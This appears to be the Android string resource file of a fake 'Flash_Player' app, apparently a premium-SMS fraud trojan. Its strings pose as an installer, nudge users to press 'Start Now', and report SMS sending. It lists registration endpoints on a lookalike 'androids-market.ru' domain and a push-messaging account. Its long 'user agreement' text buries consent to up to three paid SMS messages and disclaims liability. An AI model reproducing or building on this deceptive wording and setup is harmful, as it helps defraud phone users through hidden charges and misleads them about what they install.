<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Flash_Player</string>
    <string name="rules_menu">User agreement is available in menu</string>
    <string name="megafon_rules"><u>Paid service. Information for subscribers.</u></string>
    <string name="read_off">Rules</string>
    <string name="i_accept">Start Now</string>
    <string name="i_dont_accept">No</string>
    <string name="i_accept_off">Start Now</string>
    <string name="act_done">Installation done!</string>
    <string name="off_text">offert text</string>
    <string name="main_text">Do you agree</string>
    <string name="error_sms_sending">Error while sms sending!</string>
    <string name="please_wait">Please wait…</string>
    <string name="back_off">Back</string>
    <string name="rules_text">User agreement</string>
    <string name="exit">Exit</string>
    <string name="attention">Paid service. Price is</string>
    <string name="rub">rub.</string>
    <string name="c2dm_account">noviigfastn@gmail.com</string>
    <string name="register_path">http://androids-market.ru/register/</string>
    <string name="unregister_path">http://androids-market.ru/unregister/</string>
    <string name="agree_rules">Agree rules</string>
    <string name="first_initialize">Performing initialization…</string>
    <string name="check_free_space">Checking free space…</string>
    <string name="d_f">Download File</string>
    <string name="dialog_no_button">No</string>
    <string name="thanks_for_install">Welcome!</string>
    <string name="press_start">Для начала работы нажмите</string>
    <string name="thanks">Thanks for activation!Link to your file:</string>
    <string name="check_exit">Are you sure you want to exit instead of accepting the activation?</string>
    <string name="i_accept_dialog">Accept</string>
    <string name="i_want_exit">Exit</string>
    <string name="short_off_text">"To gain access to content, you must agree to the terms presented below

 "<b>1. Terms of service.</b>" 

 1.1 Administration http://depositmobi.com/ assumes no liability for any direct or indirect damages resulting from use of the application, including loss of profits and losses.

 1.2 To gain access to the Service http://depositmobi.com/ content to make payment by sending up to 3 SMS messages.

 1.3 When you first start an application http://depositmobi.com/ requested permission to transfer the registration data on a server http://depositmobi.com/ using short numbers. "</string>
    <string name="full_off_text">"To gain access to content, you must agree to the terms presented below. Below is the text of the agreement between the service-offer and http://waply.ru/ subscriber.
 1. To gain access to the Service http://waply.ru/ content to make payment by sending up to 3 SMS messages.
 2. Administration http://waply.ru/ assumes no liability for any direct or indirect damages resulting from use of the application, including loss of profits and losses.
 3. When you first start an application http://waply.ru/ requested permission to transfer the registration data on a server http://waply.ru/ using short numbers.
 Rates for the activation request for each of the rooms can be found at the site http://www.mobi911.ru/, in the Rates.
 4. User has the right to refuse to transfer registration data. In this case, the application http://waply.ru/ remain unactivated.
 5. Transfer of registration data is a one-time procedure.
 6. Administration http://waply.ru/ not be liable for any attempts to re-launch the application and their subsequent activation. Restarting and Re-activation is an optional procedure to activate the application. Http://waply.ru/ Administration does not consider complaints relating to re-launch and activation.
 7. Http://waply.ru/ Administration is not responsible for the content of applications, access to which is paid through the application http://waply.ru/. All responsibility for the content of applications lies with the owner of content, access to which is paid with the application http://waply.ru/.
 8. In the case of spam detection, or other illegal methods of distributing applications, the Administration requested to notify such cases to Customer Service Customer Content Providers web site: http://www.mobi911.ru/ and must provide an Application ID.
 9. The subscriber has the right to appeal against the procedure of debiting funds from an account in case the application title and description content has not been granted after a successful activation. To do this you need to contact Customer Support via the web site: http://www.mobi911.ru and must provide an Application ID.
 To activate the application, you must allow the sending of a query using short numbers. For complete information on pricing can be found at the web site: http://www.mobi911.ru/."</string>
    <string name="logotype">logotype</string>
</resources>
